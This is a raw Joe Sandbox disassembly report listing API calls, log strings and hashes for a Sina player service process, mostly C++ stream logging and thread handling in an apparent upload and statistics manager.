                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,?), ref: 0037B23D
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,?,?,?,?,?,?,?), ref: 0037B260
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,?,?,?,?,?,?,?,?,?), ref: 0037B271
                                                                                                                                                                                                      • Part of subcall function 00376260: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 003762A3
                                                                                                                                                                                                      • Part of subcall function 00376260: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 003762BA
                                                                                                                                                                                                      • Part of subcall function 00376260: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 003762CB
                                                                                                                                                                                                      • Part of subcall function 00376260: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00376402
                                                                                                                                                                                                      • Part of subcall function 00376260: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 0037640F
                                                                                                                                                                                                      • Part of subcall function 00376260: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 0037641C
                                                                                                                                                                                                      • Part of subcall function 00376260: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 0037642C
                                                                                                                                                                                                      • Part of subcall function 00376260: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00376440
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0037B294
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 0037B2B2
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037B2C1
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0037B312
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0037B31E
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0037B32A
                                                                                                                                                                                                    • ?GetMinLogLevel@logging@@YAHXZ.BASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0037B330
                                                                                                                                                                                                    • ??0LogMessage@logging@@QAE@PBDHH@Z.BASE(upload_mgr.cpp,000000FF,00000000), ref: 0037B34C
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@PBX@Z.MSVCP120(?, StartReport url = ,00000000), ref: 0037B36D
                                                                                                                                                                                                    • ??1LogMessage@logging@@QAE@XZ.BASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0037B39A
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0037B3BA
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0037B3DC
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0037B416
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0037B441
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,00000000), ref: 0037B45A
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0037B460
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(0000008C,?,00000000), ref: 0037B46A
                                                                                                                                                                                                      • Part of subcall function 0037E870: ??0SimpleThread@base@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.BASE(?,8285FFAB,00000000,00000000,00000000,0039A4C4,000000FF,?,0037B4A4,00000000,00000000,?,?,?,?,00000000), ref: 0037E89C
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,?,?,00000000), ref: 0037B4C0
                                                                                                                                                                                                    • ?FromSeconds@TimeDelta@base@@SA?AV12@_J@Z.BASE(?,0000001E,00000000,?,0037C4A0,?,?,?,?,00000000), ref: 0037B516
                                                                                                                                                                                                    • ?GetProgramCounter@tracked_objects@@YAPBXXZ.BASE ref: 0037B524
                                                                                                                                                                                                    • ??0Location@tracked_objects@@QAE@PBD0HPBX@Z.BASE(UploadMgr::StartStat,upload_mgr.cpp,00000108,00000000), ref: 0037B53D
                                                                                                                                                                                                    • ?PostDelayedTask@MessageLoop@base@@QAEXABVLocation@tracked_objects@@ABV?$Callback@$$A6AXXZ@2@VTimeDelta@2@@Z.BASE(?,00000000,00000000,?), ref: 0037B55F
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE ref: 0037B56C
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037B5BB
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037B5C7
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 0037B5D3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$V?$basic_streambuf@$?rdbuf@?$basic_ios@?width@ios_base@std@@D@std@@@2@V01@$??6?$basic_ostream@$U?$char_traits@_W@std@@@std@@$CountTick$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@??3@?setstate@?$basic_ios@_?sputc@?$basic_streambuf@?uncaught_exception@std@@D@std@@@1@@Location@tracked_objects@@Message@logging@@Osfx@?$basic_ostream@Time$??2@?flags@ios_base@std@@?sputn@?$basic_streambuf@Base@internal@base@@CallbackCallback@$$Counter@tracked_objects@@CurrentD@2@@std@@@D@std@@DebugDelayedDelta@2@@Delta@base@@FromLevel@logging@@Loop@base@@MessageOutputPostProgramSeconds@SimpleStringTask@ThreadThread@base@@V01@@V12@_V?$allocator@V?$basic_string@Z@2@
                                                                                                                                                                                                    • String ID: StartReport url = $)#sinaclient#[$)- $StartStat url = $UploadMgr::StartStat$stat_thread_$upload_mgr.cpp$Vll
                                                                                                                                                                                                    • API String ID: 2377026256-1840011207
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,.iWl,00000006,?,?,?,?,?,6C576C5D), ref: 6C576B29
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadGroupAffinity), ref: 6C576B3D
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThreadGroupAffinity), ref: 6C576B48
                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetCurrentProcessorNumberEx,?,?,?,?,?,6C576C5D), ref: 6C576B77
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 6C576B7E
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,6C576C5D), ref: 6C576B9C
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,6C576C5D), ref: 6C5A1FEB
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,?,6C576C5D), ref: 6C5A2007
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6C62CF40,00000000,?,?,?,?,?,6C576C5D), ref: 6C5A2015
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6C62CF40,00000000,?,?,?,?,?,6C576C5D), ref: 6C5A201B
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,?,6C576C5D), ref: 6C5A2031
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6C62CF40,00000000,?,?,?,?,?,6C576C5D), ref: 6C5A203F
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6C62CF40,00000000,?,?,?,?,?,6C576C5D), ref: 6C5A2045
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,?,6C576C5D), ref: 6C5A205B
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6C62CF40,00000000,?,?,?,?,?,6C576C5D), ref: 6C5A2069
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6C62CF40,00000000,?,?,?,?,?,6C576C5D), ref: 6C5A206F
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(?,?,?,?,?,?,6C576C5D), ref: 6C5A20B5
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6C62CF40,?,?,?,?,?,?,6C576C5D), ref: 6C5A20C3
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6C62CF40,?,?,?,?,?,?,6C576C5D), ref: 6C5A20C9
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,?,6C576C5D), ref: 6C5A20DF
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6C62CF40,00000000,?,?,?,?,?,6C576C5D), ref: 6C5A20ED
                                                                                                                                                                                                    • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR120(?,6C62CF40,00000000,?,?,?,?,?,6C576C5D), ref: 6C5A20F3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorExceptionThrow$AddressProc$HandleModuleVersion@$Concurrency@@Manager@1@Resource
                                                                                                                                                                                                    • String ID: .iWl$GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$]lWl$bad allocation$kernel32.dll
                                                                                                                                                                                                    • API String ID: 2361529535-36948405
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(8285FFAB), ref: 0037784E
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0037786E
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 003778A8
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 003778DF
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 003778FC
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 00377919
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 0037793C
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037794D
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120 ref: 00377967
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 00377985
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00377994
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 003779E2
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 003779EE
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 003779F7
                                                                                                                                                                                                    • ?Stop@Thread@base@@QAEXXZ.BASE ref: 00377A06
                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00377A1B
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00377A22
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00377A39
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00377A6B
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00377A9D
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120 ref: 00377AD1
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00377AD9
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,00000001,?,?), ref: 00377B13
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE(?), ref: 00377B31
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,00000001,00000000,00000000), ref: 00377B49
                                                                                                                                                                                                      • Part of subcall function 0037D8F0: ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120(?,?,6C6C52C0,00377B60,00000000), ref: 0037D8FA
                                                                                                                                                                                                      • Part of subcall function 0037D8F0: ??1FilePath@base@@QAE@XZ.BASE(?,6C6C52C0,00377B60,00000000), ref: 0037D912
                                                                                                                                                                                                      • Part of subcall function 0037D8F0: ??3@YAXPAX@Z.MSVCR120(00000000,?,6C6C52C0,00377B60,00000000), ref: 0037D921
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE(00000000), ref: 00377B8E
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00377B97
                                                                                                                                                                                                    • ?Release@?$RefCountedThreadSafe@VTaskRunner@base@@UTaskRunnerTraits@2@@base@@QBEXXZ.BASE ref: 00377BA7
                                                                                                                                                                                                    • ??1Thread@base@@UAE@XZ.BASE ref: 00377BB6
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$??3@$V?$basic_streambuf@$?rdbuf@?$basic_ios@D@std@@@2@V01@$??6?$basic_ostream@?width@ios_base@std@@FilePath@base@@$?sputc@?$basic_streambuf@TaskThreadThread@base@@U?$char_traits@_Unlock@?$basic_streambuf@W@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@CountCountedCurrentD@std@@@1@@DebugOsfx@?$basic_ostream@OutputRelease@?$RunnerRunner@base@@Safe@Stop@StringTickTraits@2@@base@@UninitializeV01@@
                                                                                                                                                                                                    • String ID: )#sinaclient#[$)- $upload_mgr.cpp$~UploadMgr
                                                                                                                                                                                                    • API String ID: 830845522-277928623
                                                                                                                                                                                                    • Opcode ID: 8a98392e80517b4af81da110bc1ce15e570b0720079fcbb38ce4f220012b8354
                                                                                                                                                                                                    • Instruction ID: e28cef5c03727a8745030980a7e2992d89e002764849b6800654d55ae9248a4b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a98392e80517b4af81da110bc1ce15e570b0720079fcbb38ce4f220012b8354
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74B19471900248DFEF22DFA4D94ABDDBBB4BF15304F0484A9E80D6B292DB755A48CF61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(8285FFAB), ref: 0037AB10
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0037AB33
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037AB6D
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0037ABB7
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0037ABD7
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037ABF4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 0037AC17
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037AC28
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037AC42
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120 ref: 0037AC4A
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 0037AC68
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037AC77
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037ACC8
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037ACD4
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 0037ACDD
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037AD29
